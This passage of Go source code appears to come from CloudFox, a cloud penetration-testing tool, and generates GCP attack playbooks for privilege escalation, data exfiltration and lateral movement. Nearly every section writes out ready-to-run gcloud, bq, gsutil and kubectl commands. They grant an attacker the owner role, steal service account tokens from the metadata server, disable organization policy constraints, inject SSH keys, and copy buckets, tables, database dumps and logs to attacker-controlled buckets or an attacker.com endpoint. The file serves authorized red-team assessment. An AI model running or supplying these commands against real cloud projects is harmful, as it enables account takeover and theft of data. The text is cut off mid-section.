sections.WriteString("steps:\n") + sections.WriteString("- name: 'gcr.io/cloud-builders/gcloud'\n") + sections.WriteString(" entrypoint: 'bash'\n") + sections.WriteString(" args:\n") + sections.WriteString(" - '-c'\n") + sections.WriteString(" - |\n") + sections.WriteString(" # Cloud Build SA has project Editor by default!\n") + sections.WriteString(" gcloud projects add-iam-policy-binding $PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n") + sections.WriteString("EOF\n\n") + sections.WriteString("# Submit build\n") + sections.WriteString("gcloud builds submit --config=cloudbuild.yaml .\n") + sections.WriteString("```\n\n") + } + + // IaC (Infrastructure as Code) + if len(categories["IaC"]) > 0 { + sections.WriteString("## Infrastructure as Code Exploitation\n\n") + sections.WriteString("Principals with IaC permissions can deploy infrastructure using the Deployment Manager service account.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["IaC"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Deployment Manager:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create deployment config that grants attacker Owner role\n") + sections.WriteString("cat > privesc-config.yaml << 'EOF'\n") + sections.WriteString("resources:\n") + sections.WriteString("- name: privesc-binding\n") + sections.WriteString(" type: gcp-types/cloudresourcemanager-v1:virtual.projects.iamMemberBinding\n") + sections.WriteString(" properties:\n") + sections.WriteString(" resource: PROJECT_ID\n") + sections.WriteString(" role: roles/owner\n") + sections.WriteString(" member: user:attacker@example.com\n") + sections.WriteString("EOF\n\n") + sections.WriteString("# Deploy - runs as [PROJECT_NUMBER]@cloudservices.gserviceaccount.com\n") + sections.WriteString("gcloud deployment-manager deployments create privesc-deploy \\\n") + sections.WriteString(" --config=privesc-config.yaml\n") + sections.WriteString("```\n\n") + } + + // GKE + if len(categories["GKE"]) > 0 { + sections.WriteString("## GKE Cluster Exploitation\n\n") + sections.WriteString("Principals with GKE permissions can access clusters, exec into pods, or read secrets.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["GKE"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Get cluster credentials\n") + sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE\n\n") + sections.WriteString("# Exec into a pod\n") + sections.WriteString("kubectl exec -it POD_NAME -- /bin/sh\n\n") + sections.WriteString("# Read secrets\n") + sections.WriteString("kubectl get secrets -A -o yaml\n\n") + sections.WriteString("# Steal node SA token (if Workload Identity not enabled)\n") + sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n") + sections.WriteString("```\n\n") + } + + // Secrets + if len(categories["Secrets"]) > 0 { + sections.WriteString("## Secret Access\n\n") + sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Secrets"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List all secrets\n") + sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") + sections.WriteString("# Access secret value\n") + sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n\n") + sections.WriteString("# Grant yourself secret access if you have setIamPolicy\n") + sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/secretmanager.secretAccessor'\n") + sections.WriteString("```\n\n") + } + + // Federation (Workload Identity) + if len(categories["Federation"]) > 0 { + sections.WriteString("## Workload Identity Federation Exploitation\n\n") + sections.WriteString("Principals with federation permissions can create identity pools that allow external identities to impersonate GCP service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Federation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create workload identity pool\n") + sections.WriteString("gcloud iam workload-identity-pools create attacker-pool \\\n") + sections.WriteString(" --location=global \\\n") + sections.WriteString(" --display-name='Attacker Pool'\n\n") + sections.WriteString("# Create OIDC provider pointing to attacker-controlled IdP\n") + sections.WriteString("gcloud iam workload-identity-pools providers create-oidc attacker-provider \\\n") + sections.WriteString(" --location=global \\\n") + sections.WriteString(" --workload-identity-pool=attacker-pool \\\n") + sections.WriteString(" --issuer-uri='https://attacker-idp.example.com' \\\n") + sections.WriteString(" --attribute-mapping='google.subject=assertion.sub'\n\n") + sections.WriteString("# Grant the pool's identities ability to impersonate a SA\n") + sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") + sections.WriteString(" PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --role=roles/iam.workloadIdentityUser \\\n") + sections.WriteString(" --member='principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/attacker-pool/*'\n") + sections.WriteString("```\n\n") + } + + // Org Policy + if len(categories["Org Policy"]) > 0 { + sections.WriteString("## Organization Policy Exploitation\n\n") + sections.WriteString("Principals with org policy permissions can disable security constraints across the organization.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Org Policy"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Disable domain restricted sharing constraint\n") + sections.WriteString("cat > policy.yaml << 'EOF'\n") + sections.WriteString("constraint: constraints/iam.allowedPolicyMemberDomains\n") + sections.WriteString("listPolicy:\n") + sections.WriteString(" allValues: ALLOW\n") + sections.WriteString("EOF\n") + sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n\n") + sections.WriteString("# Disable service account key creation constraint\n") + sections.WriteString("cat > policy.yaml << 'EOF'\n") + sections.WriteString("constraint: constraints/iam.disableServiceAccountKeyCreation\n") + sections.WriteString("booleanPolicy:\n") + sections.WriteString(" enforced: false\n") + sections.WriteString("EOF\n") + sections.WriteString("gcloud org-policies set-policy policy.yaml --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + // Network Access + if len(categories["Network Access"]) > 0 { + sections.WriteString("## Network Access Exploitation\n\n") + sections.WriteString("Principals with network access permissions can create tunnels or modify firewall rules to access internal resources.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Network Access"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - IAP Tunnel:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Start IAP tunnel to SSH port\n") + sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") + sections.WriteString(" --local-host-port=localhost:2222 \\\n") + sections.WriteString(" --zone=us-central1-a\n\n") + sections.WriteString("# SSH through the tunnel\n") + sections.WriteString("ssh -p 2222 user@localhost\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Firewall Rules:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create firewall rule allowing attacker IP\n") + sections.WriteString("gcloud compute firewall-rules create allow-attacker \\\n") + sections.WriteString(" --network=default \\\n") + sections.WriteString(" --allow=tcp:22,tcp:3389,tcp:443 \\\n") + sections.WriteString(" --source-ranges=ATTACKER_IP/32\n") + sections.WriteString("```\n\n") + } + + return sections.String() +} + +// GenerateExfilPlaybook generates a comprehensive data exfiltration playbook from attack paths +func GenerateExfilPlaybook(paths []AttackPath, identityHeader string) string { + if len(paths) == 0 { + return "" + } + + var sections strings.Builder + if identityHeader != "" { + sections.WriteString(fmt.Sprintf(`# Data Exfiltration Playbook for %s +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified data exfiltration capabilities. + +`, identityHeader)) + } else { + sections.WriteString(`# GCP Data Exfiltration Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified data exfiltration capabilities. + +`) + } + + // Group by category - includes both permission-based paths and actual misconfigurations + categories := map[string][]AttackPath{ + // Permission-based categories + "Storage": {}, + "BigQuery": {}, + "Compute Export": {}, + "Database": {}, + "Logging": {}, + "Messaging": {}, + "Secrets": {}, + "Storage Transfer": {}, + "Encryption": {}, + // Actual misconfiguration categories + "Public Snapshot": {}, + "Public Image": {}, + "Public Bucket": {}, + "Logging Sink": {}, + "Pub/Sub Push": {}, + "Pub/Sub BigQuery Export": {}, + "Pub/Sub GCS Export": {}, + "Public BigQuery": {}, + "Cloud SQL Export": {}, + "Storage Transfer Job": {}, + // Potential vector categories + "Potential Vector": {}, + } + + for _, path := range paths { + if _, ok := categories[path.Category]; ok { + categories[path.Category] = append(categories[path.Category], path) + } + } + + // Storage + if len(categories["Storage"]) > 0 { + sections.WriteString("## Cloud Storage Exfiltration\n\n") + sections.WriteString("Principals with storage permissions can read or export data from Cloud Storage buckets.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Storage"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List all buckets\n") + sections.WriteString("gcloud storage buckets list --project=PROJECT_ID\n\n") + sections.WriteString("# List objects in a bucket\n") + sections.WriteString("gcloud storage ls gs://BUCKET_NAME/\n\n") + sections.WriteString("# Download all objects\n") + sections.WriteString("gcloud storage cp -r gs://BUCKET_NAME/ ./exfil/\n\n") + sections.WriteString("# Copy to attacker-controlled bucket\n") + sections.WriteString("gcloud storage cp -r gs://VICTIM_BUCKET/ gs://ATTACKER_BUCKET/\n") + sections.WriteString("```\n\n") + } + + // BigQuery + if len(categories["BigQuery"]) > 0 { + sections.WriteString("## BigQuery Exfiltration\n\n") + sections.WriteString("Principals with BigQuery permissions can query or export data.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["BigQuery"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List datasets\n") + sections.WriteString("bq ls --project_id=PROJECT_ID\n\n") + sections.WriteString("# List tables in dataset\n") + sections.WriteString("bq ls PROJECT_ID:DATASET_NAME\n\n") + sections.WriteString("# Query data\n") + sections.WriteString("bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE` LIMIT 1000'\n\n") + sections.WriteString("# Export to GCS\n") + sections.WriteString("bq extract PROJECT:DATASET.TABLE gs://ATTACKER_BUCKET/exfil.csv\n") + sections.WriteString("```\n\n") + } + + // Compute Export + if len(categories["Compute Export"]) > 0 { + sections.WriteString("## Compute Exfiltration\n\n") + sections.WriteString("Principals with compute permissions can export snapshots and images.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Compute Export"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create snapshot of disk\n") + sections.WriteString("gcloud compute disks snapshot DISK_NAME --zone=ZONE --snapshot-names=exfil-snap\n\n") + sections.WriteString("# Export snapshot to external project\n") + sections.WriteString("gcloud compute snapshots add-iam-policy-binding exfil-snap \\\n") + sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.storageAdmin'\n\n") + sections.WriteString("# Create image from disk\n") + sections.WriteString("gcloud compute images create exfil-image --source-disk=DISK --source-disk-zone=ZONE\n") + sections.WriteString("```\n\n") + } + + // Database + if len(categories["Database"]) > 0 { + sections.WriteString("## Database Exfiltration\n\n") + sections.WriteString("Principals with database permissions can export database data.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Database"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List Cloud SQL instances\n") + sections.WriteString("gcloud sql instances list --project=PROJECT_ID\n\n") + sections.WriteString("# Export database to GCS\n") + sections.WriteString("gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DATABASE\n\n") + sections.WriteString("# Connect to instance\n") + sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER\n") + sections.WriteString("```\n\n") + } + + // Logging + if len(categories["Logging"]) > 0 { + sections.WriteString("## Logging Exfiltration\n\n") + sections.WriteString("Principals with logging permissions can access or export logs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Logging"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Read logs\n") + sections.WriteString("gcloud logging read 'resource.type=\"gce_instance\"' --project=PROJECT_ID --limit=100\n\n") + sections.WriteString("# Create sink to export logs\n") + sections.WriteString("gcloud logging sinks create exfil-sink \\\n") + sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + // Secrets + if len(categories["Secrets"]) > 0 { + sections.WriteString("## Secret Exfiltration\n\n") + sections.WriteString("Principals with secret access can retrieve sensitive credentials.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Secrets"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List all secrets\n") + sections.WriteString("gcloud secrets list --project=PROJECT_ID\n\n") + sections.WriteString("# Access secret value\n") + sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + // Storage Transfer + if len(categories["Storage Transfer"]) > 0 { + sections.WriteString("## Storage Transfer Exfiltration\n\n") + sections.WriteString("Principals with storage transfer permissions can create jobs to external clouds.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Storage Transfer"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create transfer job to AWS S3\n") + sections.WriteString("gcloud transfer jobs create \\\n") + sections.WriteString(" gs://SOURCE_BUCKET \\\n") + sections.WriteString(" s3://ATTACKER_BUCKET \\\n") + sections.WriteString(" --source-creds-file=gcp-creds.json\n") + sections.WriteString("```\n\n") + } + + // ========================================== + // ACTUAL MISCONFIGURATIONS (not just permissions) + // ========================================== + + // Public Snapshots + if len(categories["Public Snapshot"]) > 0 { + sections.WriteString("## Public Compute Snapshots\n\n") + sections.WriteString("These snapshots are publicly accessible and can be used to create disks in attacker-controlled projects.\n\n") + sections.WriteString("### Vulnerable Snapshots:\n") + for _, path := range categories["Public Snapshot"] { + sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create disk from public snapshot in attacker project\n") + sections.WriteString("gcloud compute disks create exfil-disk \\\n") + sections.WriteString(" --source-snapshot=projects/VICTIM_PROJECT/global/snapshots/SNAPSHOT_NAME \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --project=ATTACKER_PROJECT\n\n") + sections.WriteString("# Attach disk to instance\n") + sections.WriteString("gcloud compute instances attach-disk INSTANCE \\\n") + sections.WriteString(" --disk=exfil-disk --zone=us-central1-a\n\n") + sections.WriteString("# Mount and access data\n") + sections.WriteString("sudo mkdir /mnt/exfil && sudo mount /dev/sdb1 /mnt/exfil\n") + sections.WriteString("```\n\n") + } + + // Public Images + if len(categories["Public Image"]) > 0 { + sections.WriteString("## Public Compute Images\n\n") + sections.WriteString("These images are publicly accessible and may contain sensitive data or credentials.\n\n") + sections.WriteString("### Vulnerable Images:\n") + for _, path := range categories["Public Image"] { + sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create instance from public image in attacker project\n") + sections.WriteString("gcloud compute instances create exfil-vm \\\n") + sections.WriteString(" --image=projects/VICTIM_PROJECT/global/images/IMAGE_NAME \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --project=ATTACKER_PROJECT\n\n") + sections.WriteString("# Access the instance and search for credentials\n") + sections.WriteString("gcloud compute ssh exfil-vm --zone=us-central1-a\n") + sections.WriteString("find / -name '*.pem' -o -name '*.key' -o -name 'credentials*' 2>/dev/null\n") + sections.WriteString("```\n\n") + } + + // Public Buckets + if len(categories["Public Bucket"]) > 0 { + sections.WriteString("## Public Storage Buckets\n\n") + sections.WriteString("These buckets are publicly accessible.\n\n") + sections.WriteString("### Vulnerable Buckets:\n") + for _, path := range categories["Public Bucket"] { + sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List bucket contents\n") + sections.WriteString("gsutil ls -r gs://BUCKET_NAME/\n\n") + sections.WriteString("# Download all data\n") + sections.WriteString("gsutil -m cp -r gs://BUCKET_NAME/ ./exfil/\n\n") + sections.WriteString("# Search for sensitive files\n") + sections.WriteString("gsutil ls -r gs://BUCKET_NAME/ | grep -E '\\.(pem|key|json|env|config)$'\n") + sections.WriteString("```\n\n") + } + + // Logging Sinks + if len(categories["Logging Sink"]) > 0 { + sections.WriteString("## Cross-Project Logging Sinks\n\n") + sections.WriteString("These logging sinks export logs to external destinations.\n\n") + sections.WriteString("### Identified Sinks:\n") + for _, path := range categories["Logging Sink"] { + dest := path.Description + if dest == "" { + dest = path.TargetResource + } + sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create logging sink to attacker-controlled destination\n") + sections.WriteString("gcloud logging sinks create exfil-sink \\\n") + sections.WriteString(" pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/exfil-logs \\\n") + sections.WriteString(" --log-filter='resource.type=\"gce_instance\"'\n\n") + sections.WriteString("# Export all audit logs\n") + sections.WriteString("gcloud logging sinks create audit-exfil \\\n") + sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET \\\n") + sections.WriteString(" --log-filter='protoPayload.@type=\"type.googleapis.com/google.cloud.audit.AuditLog\"'\n") + sections.WriteString("```\n\n") + } + + // Pub/Sub paths (combine all Pub/Sub categories) + pubsubPaths := append(categories["Pub/Sub Push"], categories["Pub/Sub BigQuery Export"]...) + pubsubPaths = append(pubsubPaths, categories["Pub/Sub GCS Export"]...) + if len(pubsubPaths) > 0 { + sections.WriteString("## Pub/Sub Exfiltration Paths\n\n") + sections.WriteString("These Pub/Sub configurations enable data exfiltration.\n\n") + sections.WriteString("### Identified Paths:\n") + for _, path := range pubsubPaths { + dest := path.Description + if dest == "" { + dest = path.TargetResource + } + sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create push subscription to attacker endpoint\n") + sections.WriteString("gcloud pubsub subscriptions create exfil-sub \\\n") + sections.WriteString(" --topic=TOPIC_NAME \\\n") + sections.WriteString(" --push-endpoint=https://attacker.com/receive\n\n") + sections.WriteString("# Or create pull subscription and export\n") + sections.WriteString("gcloud pubsub subscriptions create exfil-pull --topic=TOPIC_NAME\n") + sections.WriteString("gcloud pubsub subscriptions pull exfil-pull --limit=1000 --auto-ack\n") + sections.WriteString("```\n\n") + } + + // Public BigQuery + if len(categories["Public BigQuery"]) > 0 { + sections.WriteString("## Public BigQuery Datasets\n\n") + sections.WriteString("These BigQuery datasets are publicly accessible.\n\n") + sections.WriteString("### Vulnerable Datasets:\n") + for _, path := range categories["Public BigQuery"] { + sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Export table to GCS bucket\n") + sections.WriteString("bq extract \\\n") + sections.WriteString(" --destination_format=NEWLINE_DELIMITED_JSON \\\n") + sections.WriteString(" 'PROJECT:DATASET.TABLE' \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data-*.json\n\n") + sections.WriteString("# Query and save locally\n") + sections.WriteString("bq query --format=json 'SELECT * FROM PROJECT.DATASET.TABLE' > exfil.json\n\n") + sections.WriteString("# Copy dataset to attacker project\n") + sections.WriteString("bq cp PROJECT:DATASET.TABLE ATTACKER_PROJECT:EXFIL_DATASET.TABLE\n") + sections.WriteString("```\n\n") + } + + // Cloud SQL Export + if len(categories["Cloud SQL Export"]) > 0 { + sections.WriteString("## Cloud SQL Export Capabilities\n\n") + sections.WriteString("These Cloud SQL instances have export capabilities.\n\n") + sections.WriteString("### Identified Instances:\n") + for _, path := range categories["Cloud SQL Export"] { + sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Export database to GCS\n") + sections.WriteString("gcloud sql export sql INSTANCE_NAME \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/dump.sql \\\n") + sections.WriteString(" --database=DATABASE_NAME\n\n") + sections.WriteString("# Export as CSV\n") + sections.WriteString("gcloud sql export csv INSTANCE_NAME \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data.csv \\\n") + sections.WriteString(" --database=DATABASE_NAME \\\n") + sections.WriteString(" --query='SELECT * FROM sensitive_table'\n") + sections.WriteString("```\n\n") + } + + // Storage Transfer Jobs (actual misconfigured jobs) + if len(categories["Storage Transfer Job"]) > 0 { + sections.WriteString("## Storage Transfer Service Jobs\n\n") + sections.WriteString("These storage transfer jobs export data to external destinations.\n\n") + sections.WriteString("### Identified Jobs:\n") + for _, path := range categories["Storage Transfer Job"] { + dest := path.Description + if dest == "" { + dest = path.TargetResource + } + sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create transfer job to external AWS S3\n") + sections.WriteString("gcloud transfer jobs create \\\n") + sections.WriteString(" gs://SOURCE_BUCKET \\\n") + sections.WriteString(" s3://attacker-bucket \\\n") + sections.WriteString(" --source-creds-file=gcs-creds.json\n") + sections.WriteString("```\n\n") + } + + // Potential Vectors + if len(categories["Potential Vector"]) > 0 { + sections.WriteString("## Potential Exfiltration Vectors\n\n") + sections.WriteString("These resources could be used for data exfiltration if compromised.\n\n") + sections.WriteString("### Identified Vectors:\n") + for _, path := range categories["Potential Vector"] { + sections.WriteString(fmt.Sprintf("- %s (%s) in %s\n", path.TargetResource, path.Method, path.ProjectID)) + } + sections.WriteString("\n") + } + + return sections.String() +} + +// GenerateLateralPlaybook generates a comprehensive lateral movement playbook from attack paths +func GenerateLateralPlaybook(paths []AttackPath, identityHeader string) string { + if len(paths) == 0 { + return "" + } + + var sections strings.Builder + if identityHeader != "" { + sections.WriteString(fmt.Sprintf(`# Lateral Movement Playbook for %s +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified lateral movement capabilities. + +`, identityHeader)) + } else { + sections.WriteString(`# GCP Lateral Movement Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified lateral movement capabilities. + +`) + } + + // Group by category + categories := map[string][]AttackPath{ + "Network": {}, + "SA Impersonation": {}, + "Compute Sharing": {}, + "Compute Access": {}, + "GKE": {}, + "Database Access": {}, + "Shared VPC": {}, + "Service Account Impersonation": {}, + "Service Account Key Creation": {}, + "Compute Instance Token Theft": {}, + "Cloud Function Token Theft": {}, + "Cloud Run Token Theft": {}, + "GKE Cluster Token Theft": {}, + "GKE Node Pool Token Theft": {}, + } + + for _, path := range paths { + if _, ok := categories[path.Category]; ok { + categories[path.Category] = append(categories[path.Category], path) + } + } + + // Network + if len(categories["Network"]) > 0 { + sections.WriteString("## Network-Based Lateral Movement\n\n") + sections.WriteString("Principals with network permissions can modify network configurations for lateral movement.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Network"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - VPC Peering:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create VPC peering to another project's network\n") + sections.WriteString("gcloud compute networks peerings create pivot \\\n") + sections.WriteString(" --network=SOURCE_NETWORK \\\n") + sections.WriteString(" --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Firewall Rules:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create firewall rule to allow access\n") + sections.WriteString("gcloud compute firewall-rules create allow-pivot \\\n") + sections.WriteString(" --network=NETWORK --allow=tcp:22,tcp:3389 \\\n") + sections.WriteString(" --source-ranges=ATTACKER_IP/32\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - IAP Tunnel:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Start IAP tunnel to SSH port\n") + sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") + sections.WriteString(" --local-host-port=localhost:2222 --zone=us-central1-a\n\n") + sections.WriteString("# SSH through the tunnel\n") + sections.WriteString("ssh -p 2222 user@localhost\n") + sections.WriteString("```\n\n") + } + + // SA Impersonation + if len(categories["SA Impersonation"]) > 0 { + sections.WriteString("## Service Account Impersonation\n\n") + sections.WriteString("Principals with impersonation capabilities can pivot to other service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["SA Impersonation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Generate access token for target SA\n") + sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Use token with any gcloud command\n") + sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Compute Access + if len(categories["Compute Access"]) > 0 { + sections.WriteString("## Compute Instance Access\n\n") + sections.WriteString("Principals with compute access can SSH into instances via OS Login or metadata modification.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Compute Access"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# SSH via OS Login (compute.instances.osLogin)\n") + sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n\n") + sections.WriteString("# SSH via OS Login with sudo (compute.instances.osAdminLogin)\n") + sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n") + sections.WriteString("# Then run: sudo su\n\n") + sections.WriteString("# Inject SSH key via instance metadata\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") + sections.WriteString("# Inject SSH key project-wide\n") + sections.WriteString("gcloud compute project-info add-metadata \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") + sections.WriteString("```\n\n") + } + + // GKE + if len(categories["GKE"]) > 0 { + sections.WriteString("## GKE Cluster Access\n\n") + sections.WriteString("Principals with GKE permissions can access clusters and pivot within them.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["GKE"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Get cluster credentials\n") + sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") + sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") + sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# List secrets for credentials\n") + sections.WriteString("kubectl get secrets -A -o yaml\n") + sections.WriteString("```\n\n") + } + + // Database Access + if len(categories["Database Access"]) > 0 { + sections.WriteString("## Database Access\n\n") + sections.WriteString("Principals with database permissions can connect to database instances.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Database Access"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + 